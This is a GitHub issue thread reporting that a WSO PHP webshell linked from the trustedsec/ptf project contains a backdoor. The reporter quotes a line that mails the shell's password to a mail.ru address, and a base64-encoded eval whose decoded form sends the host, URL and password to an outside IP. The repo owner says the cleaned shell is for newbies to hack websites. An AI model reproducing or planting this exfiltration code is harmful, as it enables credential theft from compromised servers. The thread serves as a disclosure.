### ISSUE TITLE
Webshell looks to be backdoored

### ISSUE THREAD

**Issue by i95swervin** [trustedsec/ptf#303]
I was checking the webshells out and noticed this git repo is linked to this.
https://github.com/Josexv1/wso-webshell/blob/master/wso_404.php

line 3&4
if(array_key_exists('watching',$_POST)){
$tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'root', $tmp); // Edit or delete!

on line 426
eval(base64_decode("JHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsNCiRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiR0YXJnZXQgPSByYXd1cmxkZWNvZGUoJHdlYi4kaW5qKTsNCmZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vMTg1LjYxLjEzOC4xNTcvZ2V0LnBocD91cmw9eyR0YXJnZXR9JnB3PXskYXV0aF9wYXNzfSIpOw=="));

after decoding:
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
file_get_contents("http://185.61.138.157/get.php?url={$target}&pw={$auth_pass}");

I hope this gets fixed im sure a lot of people are getting their shells jacked by the original github user @Josexv1 has some explaining to do..

**Comment by Josexv1** [comment]
As you can check [here](https://github.com/Josexv1/wso-webshell#disclaimer), i'm not the author of the code. This is a real hacking webshell, so most of the code is flawed as malware, but is uploaded for educational proposes, and is posted as it was from the original author HARD_LINUX. It clearly says edit or delete in `wso.php` and in the `404.php` is encoded as it was in the original file, I'll upload a new one with the backdoor removed so newbies can use it to haxx websites without getting hurt by an `IP` that points nowhere, and an `email` that doesn't exist.

**Comment by BustedSec** [comment]
If  I pulled down the repo into a local one and removed that line would it be an acceptable fix?

**Comment by Josexv1** [comment]
@BustedSec i have updated the repo, with the backdoor, and without the backdoor. Also a clear README. In the future i will add more modded WSO webshells, if you want you can fork and modify the module, or leave it like this.

**Comment by i95swervin** [comment]
@BustedSec thanks for the offer, public shells shouldn't even be attached to the ptf github repo in my opinion. The shell code is detected by every shitty AV. 

I figured id open a issue and let it be known that the webshells are backdoored.. Even if the email is invalid n ip not up. 

I myself prefer clean code.
 @Josexv1 thanks for updating the repo. Wasnt trying to flame you
